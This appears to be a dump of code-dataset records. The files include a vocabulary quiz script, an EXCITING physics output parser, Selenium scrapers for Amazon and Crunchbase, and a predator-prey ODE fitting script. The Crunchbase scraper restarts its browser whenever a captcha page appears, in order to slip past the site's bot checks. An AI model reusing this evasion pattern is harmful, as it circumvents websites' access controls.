encoding='utf-8') as file:\n wordlist = file.read()\n if wordlist == '':\n sys.exit(0)\n wordlist = wordlist.split(\"\\n\")\n \n for item in wordlist:\n if item == '':\n wordlist.remove(item)\n\n self.wordlist = list(set(wordlist))\n\n if len(self.wordlist) == 1:\n return None\n else:\n word = ''\n while True:\n word = random.choice(self.wordlist)\n self.wordlist.remove(word)\n if word not in self.done:\n break\n self.done.add(word)\n return word\n\n def do_score(self,operation):\n if operation == 'sync':\n with open(\"score.log\",'w', encoding='utf-8') as file:\n file.write(f\"correct,{self.score['correct']}\\n\")\n file.write(f\"wrong,{self.score['wrong']}\\n\")\n\n elif operation == 'read':\n with open('score.log',encoding='utf-8') as file:\n for line in file:\n pair = line.split(',')\n if pair[0] == 'correct':\n self.score['correct'] = int(pair[1])\n elif pair[1] == 'wrong':\n self.score['wrong'] = int(pair[1])\n\n def run(self):\n errors = []\n word = ''\n while True:\n try:\n word = self.choice()\n if word not in errors:\n exercise = object()\n if word != '' and word != None:\n self.do_score('sync')\n self.do_score('read')\n\n print(f\"#{self.number}\")\n self.number += 1\n exercise = Question(word, self.score, self.remove)\n question = exercise.output()\n if exercise.interact():\n self.score[\"correct\"] += 1\n else:\n self.score[\"wrong\"] += 1\n else:\n exercise = Question('test', self.score, self.remove)\n exercise.exit()\n else:\n continue\n except urllib.error.HTTPError as error:\n errors.append(word)\n print(error)\n print()\n continue\n except IOError as error: \n errors.append(word)\n print(error)\n print()\n continue\n except Exception as error:\n raise error\n\nclass Util:\n def clean(self):\n \"\"\"Clean temp files\"\"\"\n if os.path.exists('score.log'):\n os.remove('score.log')\n if os.path.exists(\"words.tmp\"):\n os.remove('words.tmp')\n if os.path.exists('wordpool.tmp'):\n os.remove('wordpool.tmp')\n if os.path.exists('errors.tmp'):\n os.remove('errors.tmp')\n sys.exit(0)\n\n def wordfile(self,argv):\n \"\"\"Decide from which file words will be read\"\"\"\n if_remove = False\n wordfile = ''\n if len(argv) == 1:\n with open(\"wordpool.tmp\",\"w\",encoding=\"utf-8\") as file:\n sources = os.listdir(\"source\")\n for source in sources:\n with open(f\"source/{source}\",encoding='utf-8') as src:\n for word in src:\n file.write(f\"{word}\\n\")\n wordfile = 'wordpool.tmp'\n else:\n if argv[1].lower() == 'wrong':\n with open('errors.tmp','w',encoding='utf-8') as file:\n for filename in os.listdir('wrong'):\n wrongword = filename.strip('.txt')\n file.write(f\"{wrongword}\\n\")\n wordfile = \"errors.tmp\"\n\n if len(argv) == 3:\n if argv[2].lower() == 'remove':\n if_remove = True\n \n elif argv[1].lower() == 'new':\n sources = os.listdir('source')\n sources.sort(key=lambda fn : os.path.getmtime(f'source/{fn}'))\n wordfile = f\"source/{sources[len(sources) - 1]}\"\n else:\n if argv[1].endswith(\".src\"):\n wordfile = f\"source/{argv[1].lower()}\"\n else:\n wordfile = f\"source/{argv[1].lower()}.src\"\n return (wordfile,if_remove)\n\n#Main entry\ndef main():\n #if remove corrected wrong word file\n if_remove = False\n util = Util()\n wordfile,if_remove = util.wordfile(sys.argv)\n\n #Startup\n try:\n View().clear().header(80).title(f\"Exercise on {wordfile}\")\n Exercise(wordfile).setRemove(if_remove).run()\n except Exception as error:\n raise error\n print(error)\n print()\n util.clean()\n pass\n\nmain()","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"222528292","text":"\n# EXCITING text logs and XML outputs parser\n# v010814\n\nimport os\nimport sys\nimport math\nfrom fractions import Fraction\n\nfrom xml.etree import ElementTree as ET\nimport xml.dom.minidom\n\nfrom ase.units import Bohr, Hartree\nfrom ase import Atoms\n\nfrom numpy import dot\nfrom numpy import array\nfrom numpy import transpose\nfrom numpy import linalg\n\nfrom parsers import Output\nfrom core.electron_structure import Edos, Ebands\nfrom core.constants import Constants\n\n\n# Non-critical parsing exception\nclass SecondaryParsingError(Exception):\n def __init__(self, value):\n self.value = value\n\n# INFO.OUT parser\nclass INFOOUT(Output):\n def __init__(self, file, **kwargs):\n\n if os.path.basename(file) != 'INFO.OUT': raise RuntimeError(\"Skipping not a master output!\")\n\n Output.__init__(self, file)\n\n cur_folder = os.path.dirname(file)\n\n self.info['framework'] = 'EXCITING'\n self.info['finished'] = -1\n\n cartesian = False\n atoms_holder = [[]]\n cell = []\n forces, energies, energies_opt = [], [], []\n rmts, mtrps, bsseq = [], [], []\n specienum = 0\n first_cycle_lithium, opt_flag = True, False\n\n # TODO: relate with schema file?\n H_mapping = {\n 1: 'pure HF',\n 3: 'LSDAPerdew-Wang',\n 22: 'PBEsol',\n 20: 'PBE-GGA/PBE-GGA',\n 100:'PBE-GGA/PBE-GGA'\n }\n\n self.data = open(file).readlines()\n\n # Main loop begin\n for n in range(len(self.data)):\n line = self.data[n]\n if ' EXCITING ' in line:\n if 'started' in line:\n version = line.split()[2].capitalize()\n if version not in ['Helium', 'Lithium', 'Beryllium', 'Mortadella', 'Boron']: raise RuntimeError(\"This Exciting version is currently not supported!\")\n self.info['prog'] = 'Exciting ' + version\n\n elif 'Convergence targets achieved' in line:\n if not energies_opt: self.info['finished'] = 1\n\n elif 'Force convergence target achieved' in line:\n self.info['finished'] = 1\n\n elif 'Lattice vectors' in line:\n for i in range(n+1, n+4):\n cell.append( map(lambda x: float(x) * Bohr, self.data[i].split()) )\n n += 3\n\n elif 'Species : ' in line:\n symb = line.split('(')[-1][:-2].encode('ascii')\n nrepeat = 0\n while 1:\n n += 1\n if 'muffin-tin radius' in self.data[n]:\n rmt = float( self.data[n].split(\":\")[-1].strip() )\n elif 'of radial points in muffin-tin' in self.data[n]:\n mtrp = int( self.data[n].split(\":\")[-1].strip() )\n elif 'atomic positions (' in self.data[n]:\n if not cartesian:\n if not 'lattice' in self.data[n]: cartesian = True\n while 1:\n n += 1\n a = self.data[n].split()\n try: int(a[0])\n except (ValueError, IndexError): break\n else:\n atoms_holder[-1].append([symb])\n atoms_holder[-1][-1].extend( map(float, [a[2], a[3], a[4]]) )\n nrepeat += 1\n break\n if not energies: # do it only for the first structure!\n rmts.extend([rmt] * nrepeat)\n mtrps.extend([mtrp] * nrepeat)\n bsseq.extend([specienum] * nrepeat)\n specienum += 1\n\n elif 'Spin treatment ' in line:\n mark = line.split(\":\")[-1].strip()\n if len(mark): # Beryllium\n if 'spin-polarised' in mark:\n self.info['spin'] = True\n if 'orbit coupling' in self.data[n+1]: self.info['techs'].append('spin-orbit coupling')\n else: # Lithium\n if 'spin-polarised' in self.data[n+1]:\n self.info['spin'] = True\n if 'orbit coupling' in self.data[n+2]: self.info['techs'].append('spin-orbit coupling')\n\n elif 'k-point grid ' in line:\n self.info['k'] = \"x\".join(line.split(\":\")[-1].split())\n\n elif 'Smallest muffin-tin radius times maximum |G+k|' in line: # Lithium\n self.electrons['rgkmax'] = float(line.split(\":\")[-1].strip())\n\n elif 'R^MT_min * |G+k|_max (rgkmax)' in line: # Beryllium\n self.electrons['rgkmax'] = float(line.split(\":\")[-1].strip())\n\n elif 'Smearing scheme ' in line:\n t = line.split(\":\")[-1].strip()\n if len(t): self.info['smeartype'] = t\n else: self.info['smeartype'] = self.data[n+1].split(\":\")[-1].strip()\n\n elif 'Smearing width ' in line:\n self.info['smear'] = float(line.split(\":\")[-1].strip())\n\n elif 'orrelation type ' in line:\n\n #if 'Correlation type :' in line:\n #if 'Exchange-correlation type :' in line:\n #if 'Exchange-correlation type' in line:\n\n try: h = int(line.split(\":\")[-1])\n except ValueError: pass # then this is not what we want\n try: self.info['H'] = H_mapping[h]\n except KeyError: self.info['H'] = h\n\n elif 'otal energy ' in line:\n try: energies.append( float(line.split(\":\")[-1]) * Hartree )\n except ValueError: energies.append(0.0)\n\n elif 'Structure-optimization module started' in line:\n opt_flag = True\n # First cycle convergence statuses\n self.info['convergence'] = self.compare_vals(energies)\n self.info['ncycles'].append(len(self.info['convergence']))\n\n elif '| Updated atomic positions ' in line: # Lithium\n atoms_holder.append([])\n\n if first_cycle_lithium:\n # First cycle convergence statuses\n self.info['convergence'] = self.compare_vals(energies)\n first_cycle_lithium = False\n\n elif '| Optimization step ' in line: # Beryllium\n self.info['finished'] = -1\n atoms_holder.append([])\n while 1:\n n += 1\n\n try: self.data[n]\n except IndexError:\n atoms_holder.pop()\n break\n\n if ' scf iterations ' in self.data[n]:\n self.info['ncycles'].append( int(self.data[n].split(\":\")[-1].split()[0]) )\n elif 'Maximum force magnitude' in self.data[n]:\n f = self.data[n].split(\":\")[-1].split(\"(\")\n forces.append( float(f[0]) - float(f[-1][:-2]) )\n elif 'Total energy' in self.data[n]:\n try: energies_opt.append( float(self.data[n].split(\":\")[-1]) * Hartree )\n except ValueError: energies_opt.append(0.0)\n elif 'Atomic positions' in self.data[n]:\n while 1:\n n += 1\n if 'atom' in self.data[n]:\n a = self.data[n].split()\n atoms_holder[-1].append([a[2]])\n atoms_holder[-1][-1].extend( map(float, a[4:]) )\n else: break\n break\n\n elif 'Timings (CPU seconds) ' in line: # Lithium\n while 1:\n n += 1\n if ' total ' in self.data[n]:\n self.info['duration'] = \"%2.2f\" % (float(self.data[n].split(\":\")[-1])/3600)\n break\n elif len(self.data[n]) < 4: break\n self.info['duration']\n\n elif 'Total time spent ' in line: # Beryllium\n self.info['duration'] = \"%2.2f\" % (float(self.data[n].split(\":\")[-1])/3600)\n\n elif line.startswith(' Fermi '):\n try: e_last = float(self.data[n].split(\":\")[-1]) * Hartree\n except ValueError: raise RuntimeError(\"Fermi energy is out of physical bounds! Terminating.\")\n\n elif 'Number of empty states' in line:\n self.info['techs'].append( '%s empty states' % int(self.data[n].split(\":\")[-1]) )\n # Main loop end\n\n if not cell or not atoms_holder[-1]: raise RuntimeError(\"Structure not found!\")\n\n if energies_opt: self.info['energy'] = energies_opt[-1]\n else:\n try: self.info['energy'] = energies[-1]\n except IndexError: pass\n\n if not self.info['convergence']:\n # First cycle convergence statuses\n self.info['convergence'] = self.compare_vals(energies)\n\n if len(forces) != len(energies_opt) or len(forces) != len(self.info['ncycles']): self.warning(\"Warning! Unexpected convergence data format!\")\n else:\n for n in range(len(energies_opt)):\n self.info['tresholds'].append([forces[n], 0.0, 0.0, 0.0, energies_opt[n]])\n\n # NB lattice is always the same\n for structure in atoms_holder:\n symbols, pos = [], []\n for a in structure:\n symbols.append(a[0])\n pos.append(a[1:])\n if cartesian: self.structures.append(Atoms(symbols=symbols, cell=cell, positions=pos, pbc=True))\n else: self.structures.append(Atoms(symbols=symbols, cell=cell, scaled_positions=pos, pbc=True))\n\n # Check if convergence achieved right away from the first cycle and account that\n if opt_flag and len(self.structures) == 1:\n self.structures.append(self.structures[-1])\n self.info['tresholds'].append([0.0, 0.0, 0.0, 0.0, energies[-1]])\n\n self.structures[-1].new_array('rmt', rmts, float)\n self.structures[-1].new_array('mtrp', mtrps, int)\n self.structures[-1].new_array('bs', bsseq, int)\n\n # Warnings\n #try: w = map(lambda x: x.strip(), open(cur_folder + '/WARNINGS.OUT').readlines())\n #except IOError: pass\n #else:\n # # TODO: Get rid of redundant messages\n # # Warning(charge)\n # self.warning( \" \".join(w) )\n\n # Electronic properties: the best case, too good\n # look for full DOS in xml\n if os.path.exists(os.path.join(cur_folder, 'dos.xml')):\n f = open(os.path.join(cur_folder, 'dos.xml'),'r')\n try: self.electrons['dos'] = Edos(parse_dosxml(f, self.structures[-1].get_chemical_symbols()))\n except SecondaryParsingError as e: self.warning(\"Error in dos.xml file: %s.\" % e.value)\n except: self.warning(\"Problems with parsing dos.xml!\")\n finally: f.close()\n\n # look for interpolated bands in xml\n if os.path.exists(os.path.join(cur_folder, 'bandstructure.xml')):\n f = open(os.path.join(cur_folder, 'bandstructure.xml'),'r')\n try: self.electrons['bands'] = Ebands(parse_bandsxml(f))\n except SecondaryParsingError as e: self.warning(\"Error in bandstructure.xml file: %s.\" % e.value)\n except: self.warning(\"Problems with parsing bandstructure.xml!\")\n finally: f.close()\n\n # Electronic properties: the worst case, look for total DOS and raw bands in EIGVAL.OUT\n if os.path.exists(os.path.join(cur_folder, 'EIGVAL.OUT')) and (not self.electrons['dos'] or not self.electrons['bands']):\n f = open(os.path.join(cur_folder, 'EIGVAL.OUT'),'r')\n # why such a call? we try to spare RAM\n # so let's look whether these variables are filled\n # and fill them only if needed\n try: kpts, columns = parse_eigvals(f, e_last)\n except SecondaryParsingError as e: self.warning(\"Error in EIGVAL.OUT file: %s.\" % e.value)\n else:\n # obviously below should repeat XML data (but note interpolation problems on small k-sets!)\n if not self.electrons['dos']:\n self.warning(\"dos.xml is absent, EIGVAL.OUT is taken.\")\n for c in columns:\n for i in c:\n self.electrons['projected'].append(i)\n self.electrons['projected'].sort()\n\n if not self.electrons['bands']:\n self.warning(\"bandstructure.xml is absent, EIGVAL.OUT is taken.\")\n band_obj = {'ticks': [], 'abscissa': [], 'stripes': []}\n d = 0.0\n bz_vec_ref = [0, 0, 0]\n for k in kpts:\n bz_vec_cur = dot( k, linalg.inv( self.structures[-1].cell ).transpose() )\n bz_vec_dir = map(sum, zip(bz_vec_cur, bz_vec_ref))\n bz_vec_ref = bz_vec_cur\n d += linalg.norm( bz_vec_dir )\n band_obj['abscissa'].append(d)\n band_obj['stripes'] = transpose(columns).tolist()\n self.electrons['bands'] = Ebands(band_obj)\n\n finally: f.close()\n\n if not self.electrons['dos'] and not self.electrons['bands']: self.warning(\"Electron structure not found!\")\n self.electrons['type'] = 'FP_LAPW'\n\n # Input\n try: inp = xml.dom.minidom.parse(os.path.join(cur_folder, 'input.xml'))\n except: self.warning(\"Problems with parsing input.xml!\")\n else:\n speciespath = inp.getElementsByTagName(\"structure\")[0].attributes['speciespath'].value\n relpath_flag = False if os.path.isabs(speciespath) else True\n species_types, self.electrons['basis_set'] = [], []\n\n for sp in inp.getElementsByTagName(\"species\"):\n v = sp.attributes['speciesfile'].value\n if not v in species_types: species_types.append(v)\n for sp in species_types:\n # TODO: https://docs.python.org/2/library/xml.html#xml-vulnerabilities\n try_path = os.path.realpath( os.path.join(cur_folder, os.path.join(speciespath, sp)) ) if relpath_flag else os.path.join(speciespath, sp) # WARNING! This may be dangerous!\n if not os.path.exists(try_path):\n self.electrons['basis_set'] = None\n self.warning(\"No BS available: %s cannot be found!\" % try_path)\n break\n else:\n try: self.electrons['basis_set'] += [ parse_specie(try_path) ]\n except SecondaryParsingError as e:\n self.electrons['basis_set'] = None\n self.warning(\"Error in specie file: %s\" % e.value)\n\n self.info['input'] = inp.toprettyxml(newl=\"\", indent=\" \")\n\n # Phonons\n if os.path.exists(os.path.join(cur_folder, 'PHONON.OUT')):\n f = open(os.path.join(cur_folder, 'PHONON.OUT'), 'r')\n linelist = f.readlines()\n filelen = len(linelist)\n n_at = len(self.structures[-1])\n n_line = 0\n while n_line < filelen:\n n_line += 1\n modes, irreps, ph_eigvecs = [], [], []\n k_coords = \" \".join( map(lambda x: \"%s\" % Fraction(x), linelist[n_line].split()[1:4]) ) # TODO : find weight of every symmetry k-point!\n\n # next line is empty\n n_line += 2\n for i in range(n_at*3):\n\n # read mode number and frequency\n modes.append( float(linelist[n_line].split()[1]) * Constants.ha2rcm )\n irreps.append(\"\")\n n_line += 1\n\n # read eigenvectors\n container = []\n for atom in range(n_at):\n for disp in range(3):\n try: container.append( float(linelist[n_line].split()[3]) )\n except ValueError: container.append(0.0)\n #float(linelist[n_line].split()[4])\n n_line += 1\n\n ph_eigvecs.append(container)\n\n # two empty lines follow\n n_line +=1\n\n self.phonons['modes'][ k_coords ] = modes\n self.phonons['irreps'][ k_coords ] = irreps\n self.phonons['ph_eigvecs'][ k_coords ] = ph_eigvecs\n\n f.close()\n\n kset = self.phonons['modes'].keys()\n if kset > 1:\n for i in kset:\n self.phonons['ph_k_degeneracy'][ i ] = 1 # TODO : find weight of every symmetry k-point!\n\n def compare_vals(self, vals):\n cmp = []\n for n in range(len(vals)):\n try: cmp.append( int( math.floor( math.log( abs( vals[n] - vals[n+1] ), 10 ) ) ) )\n except (IndexError, ValueError): pass # beware log math domain error when the adjacent values are the same\n return cmp\n\n @staticmethod\n def fingerprints(test_string):\n if test_string.startswith('All units are atomic (Hartree, Bohr, etc.)') or test_string.startswith('| All units are atomic (Hartree, Bohr, etc.)'): return True\n else: return False\n\n# dos.xml parser\ndef parse_dosxml(fp, symbols):\n dos_obj = {'x': [],}\n dos = []\n symbol_counter = 0\n first_cyc, new_part = True, True\n\n for action, elem in ET.iterparse(fp, events=('end',)):\n if elem.tag=='totaldos':\n if len(dos) != len(dos_obj['x']): raise SecondaryParsingError(\"Data in dos.xml are mismatched!\")\n dos_obj['total'] = dos\n dos, new_part = [], True\n\n elif elem.tag=='partialdos':\n target_atom = elem.attrib['speciessym']\n if not target_atom:\n target_atom = symbols[symbol_counter]\n symbol_counter += 1\n if not target_atom in dos_obj: dos_obj[target_atom] = dos\n else:\n if len(dos) != len(dos_obj[target_atom]): raise SecondaryParsingError(\"Unexpected data format in dos.xml!\")\n dos_obj[target_atom] = [sum(s) for s in zip( dos_obj[target_atom], dos )]\n dos, new_part = [], True\n\n elif elem.tag=='interstitialdos':\n dos_obj['interstitial'] = dos\n dos, new_part = [], True\n\n elif elem.tag=='diagram':\n if not new_part:\n # orbital contributions are merged : TODO\n # spins are merged : TODO\n dos = [sum(s) for s in zip( dos[ : len(dos)/2], dos[len(dos)/2 : ] )]\n\n #spin = {1: 'alpha', 2: 'beta'}\n #target_spin = spin[ int( elem.attrib['nspin'] ) ]\n #if 'n' in elem.attrib: n = elem.attrib['n']\n #if 'l' in elem.attrib: l = elem.attrib['l']\n\n first_cyc, new_part = False, False\n\n elif elem.tag=='point':\n if first_cyc: dos_obj['x'].append( float(elem.attrib['e']) * Hartree )\n dos.append(float(elem.attrib['dos']))\n\n elem.clear()\n\n return dos_obj\n\n# bandstructure.xml parser\ndef parse_bandsxml(fp):\n band_obj = {'ticks': [], 'abscissa': [], 'stripes': [[],]}\n first_cyc = True\n\n for action, elem in ET.iterparse(fp, events=('end',)):\n if elem.tag=='band':\n band_obj['stripes'].append([])\n first_cyc = False\n\n elif elem.tag=='point':\n if first_cyc: band_obj['abscissa'].append( float(elem.attrib['distance']) )\n band_obj['stripes'][-1].append(float(elem.attrib['eval']) * Hartree)\n\n elif elem.tag=='vertex':\n band_obj['ticks'].append( [ float(elem.attrib['distance']), elem.attrib['label'] ] ) # NB : elem.attrib['coord']\n\n elem.clear()\n\n if band_obj['ticks'][0][0] != band_obj['abscissa'][0] or band_obj['ticks'][-1][0] != band_obj['abscissa'][-1]: raise SecondaryParsingError(\"Unexpected data format in bandstructure.xml!\")\n band_obj['stripes'].pop() # last []\n\n return band_obj\n\n# EIGVAL.OUT parser\ndef parse_eigvals(fp, e_last):\n kpts = []\n columns = []\n while 1:\n s = fp.readline()\n if not s: break\n s = s.strip()\n if len(s) < 20: # first two lines or section dividers\n if not columns:\n columns.append([])\n continue\n if not columns[-1]:\n continue\n else:\n columns[-1] = map(lambda x: x-e_last, columns[-1])\n columns.append([])\n elif len(s) > 45: # k-point coords\n kpts.append( map(float, s.split()[1:4]) )\n else:\n try: int(s[0])\n except ValueError: # comment\n continue\n else:\n n, e, occ = s.split()\n columns[-1].append(float(e)*Hartree)\n columns.pop() # last []\n columns = array(columns)\n if columns.ndim != 2: raise SecondaryParsingError('Invalid dimensions of columns!')\n return kpts, columns\n\n# species parser\ndef parse_specie(path):\n azimuthal_sequence = ['s', 'p', 'd', 'f', 'g', 'h']\n basis = {}\n try: specie = xml.dom.minidom.parse(path)\n except: raise SecondaryParsingError(\"Unable to parse %s\" % path)\n else:\n #elem = specie.getElementsByTagName(\"sp\")[0].attributes['chemicalSymbol'].value\n mt = specie.getElementsByTagName(\"muffinTin\")[0]\n basis['rmin'] = float(mt.attributes['rmin'].value) # innermost grid point (!)\n basis['rmt'] = float(mt.attributes['radius'].value) # default rmt\n basis['rinf'] = float(mt.attributes['rinf'].value) # effective infinity\n basis['rmtp'] = int(mt.attributes['radialmeshPoints'].value) # grid points in the muffin tin (!)\n \n basis['states'] = []\n for atst in specie.getElementsByTagName(\"atomicState\"):\n basis['states'].append({})\n basis['states'][-1]['n'] = int(atst.attributes['n'].value)\n basis['states'][-1]['l'] = azimuthal_sequence[ int(atst.attributes['l'].value) ]\n basis['states'][-1]['kappa'] = int(atst.attributes['kappa'].value)\n basis['states'][-1]['occ'] = int(float(atst.attributes['occ'].value))\n basis['states'][-1]['is_core'] = True if atst.attributes['core'].value.lower() == 'true' else False\n basis['states'].sort(cmp = lambda x, y: -1 if azimuthal_sequence.index(x['l']) < azimuthal_sequence.index(y['l']) else 1) # accordingly\n basis['states'].sort(cmp = lambda x, y: -1 if x['n'] < y['n'] else 1) # accordingly\n \n basis['default'] = {}\n default = specie.getElementsByTagName(\"default\")[0]\n basis['default']['type'] = default.attributes['type'].value\n basis['default']['trialEnergy'] = float(default.attributes['trialEnergy'].value)\n basis['default']['searchE'] = True if default.attributes['searchE'].value.lower() == 'true' else False\n \n basis['custom'] = []\n for cstm in specie.getElementsByTagName(\"custom\"):\n basis['custom'].append({})\n basis['custom'][-1]['l'] = azimuthal_sequence[ int(cstm.attributes['l'].value) ]\n basis['custom'][-1]['type'] = cstm.attributes['type'].value\n basis['custom'][-1]['trialEnergy'] = float(cstm.attributes['trialEnergy'].value)\n basis['custom'][-1]['searchE'] = True if cstm.attributes['searchE'].value.lower() == 'true' else False\n basis['custom'].sort(cmp = lambda x, y: -1 if azimuthal_sequence.index(x['l']) < azimuthal_sequence.index(y['l']) else 1) # accordingly\n \n basis['lo'] = []\n for lo in specie.getElementsByTagName(\"lo\"):\n basis['lo'].append([ azimuthal_sequence[ int(lo.attributes['l'].value) ] ])\n for wf in lo.getElementsByTagName(\"wf\"):\n basis['lo'][-1].append({})\n basis['lo'][-1][-1]['deriv'] = int(wf.attributes['matchingOrder'].value)\n basis['lo'][-1][-1]['trialEnergy'] = float(wf.attributes['trialEnergy'].value)\n basis['lo'][-1][-1]['searchE'] = True if wf.attributes['searchE'].value.lower() == 'true' else False\n basis['lo'].sort(cmp = lambda x, y: -1 if azimuthal_sequence.index(x[0]) < azimuthal_sequence.index(y[0]) else 1) # accordingly\n \n return basis\n\n","sub_path":"parsers/EXCITING/EXCITING.py","file_name":"EXCITING.py","file_ext":"py","file_size_in_byte":24551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"341517441","text":"from selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\nclass AmazonSpider:\n\n def __init__(self, marca, modelo):\n self.marca = marca\n self.modelo = modelo\n\n def launch_spider(self):\n pass\n\n\ntext_to_search = 'lg k40'\n\nbrowser = webdriver.Chrome()\nbrowser.get('https://www.amazon.es/')\n\nsearch_bar = browser.find_element_by_id('twotabsearchtextbox')\nsearch_bar.send_keys(text_to_search)\nsearch_bar.submit()\n\n# Ya hemos llegado a la página con el listado de productos\nlist_of_products = browser.find_element_by_css_selector(\".sg-col-inner .s-search-results\")\n\nlist_of_products = list_of_products.find_elements_by_xpath('child::div')\n\ni = 0\nfor p in list_of_products:\n try:\n p.find_element_by_class_name('s-shopping-adviser')\n p.find_element_by_class_name('s-border-top-overlap')\n except:\n i += 1\n\nprint(i)","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"134972043","text":"from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport io\r\nimport numpy as np\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport pandas as pd\r\nimport csv\r\nfrom fake_useragent import UserAgent\r\n\r\n#insert the path of the geckodriver in your local machine\r\ngeckodriver_path = \"\"\r\n\r\nfinal_data = pd.read_csv(\"../data/initial_datasets/Business_Analytics/data/technology_nan\",delimiter = '|')\r\ncrunchbase_dataset = pd.read_excel('../data/initial_datasets/crunchbase_monthly_export_d43b4klo2ade53.xlsx',sheet_name = 'Companies')\r\ncrunchbase_dataset1 = crunchbase_dataset.rename(columns = {'name':'company_name'})\r\n\r\nmerged = pd.merge(final_data,crunchbase_dataset1, on = 'company_name').loc[:,['company_name','permalink']]\r\n\r\nlinks = merged.loc[:,'permalink']\r\ndriver = webdriver.Firefox(executable_path=geckodriver_path)\r\nwith io.open('../data/initial_datasets/descriptions_scraped/Descriptions.csv','a',newline='',encoding=\"utf-8\") as csvfile:\r\n write = csv.writer(csvfile, delimiter = '|')\r\n for i in range(939,1004):\r\n new_url = 'https://www.crunchbase.com/{0}'.format(links[i])\r\n driver.get(new_url)\r\n time.sleep(np.random.randint(1,3))\r\n content = driver.page_source\r\n soup = BeautifulSoup(content, \"lxml\")\r\n captcha_code = soup.find(\"div\", class_=\"page-title\")\r\n if captcha_code != None:\r\n driver.quit()\r\n i -= 1\r\n driver = webdriver.Firefox(executable_path=geckodriver_path)\r\n continue\r\n try:\r\n cerca = driver.find_element_by_xpath(\"/html/body/chrome/div/mat-sidenav-container/mat-sidenav-content/entity/page-layout/div[2]/div/div[2]/div/div[1]/entity-section[1]/section-layout/mat-card/div[2]/description-card/a\")\r\n cerca.click()\r\n except:\r\n pass\r\n description_code = soup.find(\"div\", class_=\"cb-display-inline\")\r\n if description_code == None:\r\n continue\r\n description = description_code.get_text()\r\n name_code = soup.find(\"div\", class_=\"component--image-with-text-card\")\r\n name = name_code.find('span',class_=\"ng-star-inserted\").get_text()\r\n write.writerow([name,description])\r\n csvfile.flush()\r\n","sub_path":"code/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"382422052","text":"import time\nimport numpy as np\nimport pandas as pd\n# from main import ODE_error, hillclimber, sim_an, gen_al\nimport warnings\nimport scipy\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\nimport random\nwarnings.filterwarnings('ignore')\n\n\nseedy = 5\nreps = 10\ndf = pd.read_csv(\"predator-prey-data.csv\")\nt = df.values[:,0]\ndata = np.transpose(np.array([df.loc[:,'x'].values.tolist(),df.loc[:,'y'].values.tolist()]))\nstart = time.time()\nn_gen=1\npopsize=2\nn_parents=2\np_mutate=0.3\nn_iter = 5000\n\n#Create functions\ndef get_ODE(data, t, alpha, beta, gamma, delta):\n \"\"\"Returns set of ODE's for given data and params.\"\"\"\n\n # data should be array-like of prey and predator quantities respectively\n # params should be array-like of 4 params (alpha, beta, gamma, delta)\n x, y = data\n dxdt = alpha * x - beta * x * y\n dydt = delta * x * y - gamma * y\n return [dxdt, dydt]\n\ndef ODE_error(params,data,t,evalfunc='RMSE'):\n \"\"\"Solves set of ODE's for given data and params.\"\"\"\n\n # data should be array-like of prey and predator quantities respectively\n # ODE should be function that returns ODE's\n # params should be array-like of 4 params (alpha, beta, gamma, delta)\n\n\n init = data[0]\n est = scipy.integrate.odeint(get_ODE, init, t, args=tuple(params))\n if evalfunc == 'MSE':\n error_x = mean_squared_error(est[:,0],data[:,0])\n error_y = mean_squared_error(est[:,1],data[:,1])\n error = np.mean([error_x,error_y])\n elif evalfunc == 'RMSE':\n error_x = mean_squared_error(est[:, 0], data[:, 0],squared=False)\n error_y = mean_squared_error(est[:, 1], data[:, 1],squared=False)\n error = np.mean([error_x, error_y])\n else:\n error_x = mean_absolute_error(est[:, 0], data[:, 0])\n error_y = mean_absolute_error(est[:, 1], data[:, 1])\n error = np.mean([error_x, error_y])\n return error\n\ndef hillclimber(function, data,t,params0=(0,0,0,0),evalfunc='RMSE',n_iter=1000,stepsize=1):\n \"\"\"Finds optimum by using hill climber algorithm (local search)\"\"\"\n\n est_params = params0\n try: est_eval = function(params0, data, t, evalfunc)\n except ValueError: est_eval = 100\n eval_list = [est_eval]\n for iter in range(n_iter):\n new_params = np.array(est_params) + np.random.uniform(-1,1,len(params0))*stepsize\n new_params[new_params < 0] = 0\n new_params[new_params > 10] = 10\n\n try: new_eval = function(new_params,data,t,evalfunc)\n except ValueError: new_eval = 100\n if new_eval <= est_eval:\n est_params, est_eval = new_params, new_eval\n eval_list.append(est_eval)\n return (est_eval, est_params, eval_list)\n\ndef sim_an(function,data,t,params0=(0,0,0,0),evalfunc='RMSE',stepsize=0.25,\n temprange=(10**0,10**-3),n_iter=5000,cooling='quadratic',n_inner=50):\n \"\"\"Performs simulated annealing to find a global solution\"\"\"\n temp0 = temprange[0]\n temp_end = temprange[1]\n if cooling == 'exponential':\n rate = (temp_end / temp0) ** (1 / (n_iter/n_inner - 1))\n elif cooling == 'linear':\n rate = (temp0-temp_end)/(n_iter/n_inner)\n else:\n alpha = (temp0 / temp_end - 1) / (n_iter/n_inner) ** 2\n\n est_params = params0\n try: est_eval = function(params0, data, t, evalfunc)\n except ValueError: est_eval = 100\n eval_list = [est_eval]\n epoch = 0\n temp = temp0\n\n for i in range(int(n_iter/n_inner)):\n inner_params, inner_eval = est_params, est_eval\n for j in range(n_inner):\n new_params = np.array(inner_params) + np.random.uniform(-1,1,len(params0))*stepsize\n new_params[new_params < 0] = 0\n new_params[new_params > 10] = 10\n try: new_eval = function(new_params, data, t, evalfunc)\n except ValueError: new_eval = 100\n delta_eval = new_eval - inner_eval\n if delta_eval < 0:\n inner_params, inner_eval = new_params, new_eval\n elif np.random.uniform(0, 1) < np.exp(-delta_eval / temp):\n inner_params, inner_eval = new_params, new_eval\n est_params, est_eval = inner_params, inner_eval\n eval_list.append(est_eval)\n epoch += 1\n if cooling == 'exponential':\n temp *= rate\n elif cooling == 'linear':\n temp -= rate\n else:\n temp = temp0 / (1 + alpha * i ** 2)\n\n return (est_eval, est_params, eval_list)\n\n\n# 